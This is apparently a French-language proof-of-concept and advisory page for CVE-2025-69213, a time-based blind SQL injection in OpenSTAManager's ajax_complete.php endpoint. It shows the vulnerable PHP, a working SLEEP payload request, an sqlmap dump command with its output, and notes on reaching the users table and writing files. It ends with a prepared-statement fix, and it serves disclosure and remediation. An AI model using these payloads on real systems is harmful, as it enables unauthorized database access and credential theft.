
Dépôt de preuve de concept pour CVE-2025-69213, démontrant une vulnérabilité SQL injection dans le point de terminaison ajax_complete.php d'OpenSTAManager avec une exploitation aveugle basée sur le temps et des conseils de remédiation.
| Champ | Détails |
|---|---|
| Identifiant CVE | CVE-2025-69213 |
| Gravité | ÉLEVÉE |
| Avis de sécurité | Voir l'avis |
| Découvert par | Lukasz Rybak |
Une vulnérabilité d'injection SQL existe dans l'endpoint ajax_complete.php lors du traitement de l'opération get_sedi. Un attaquant authentifié peut injecter du code SQL malveillant via le paramètre idanagrafica, conduisant à un accès non autorisé à la base de données.
Fichier : modules/anagrafiche/ajax/complete.php:28
case 'get_sedi':
$idanagrafica = get('idanagrafica');
$q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione
FROM an_sedi
WHERE idanagrafica='".$idanagrafica."' ...";
$rs = $dbo->fetchArray($q);
$_GET['idanagrafica'] → get('idanagrafica')$dbo->fetchArray($q) exécute la requête malveillantePreuve de concept manuelle (SQLi aveugle basée sur le temps) :
GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<session-valide>
Exploitation avec SQLMap :
sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \
--cookie="PHPSESSID=<session>" \
--dbms=MySQL \
--technique=T \
--level=3 \
--dump
Sortie SQLMap :
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
back-end DBMS: MySQL >= 5.0.12
zz_users pour obtenir un accès administrateur.SELECT ... INTO OUTFILE si les permissions de fichiers le permettent.Remplacer la concaténation directe par des instructions préparées :
Avant :
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";
Après :
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";
Découvert par : Łukasz Rybak
Cette CVE a été divulguée de manière responsable selon les pratiques de divulgation coordonnée des vulnérabilités. Les informations fournies ici le sont à des fins éducatives et défensives uniquement.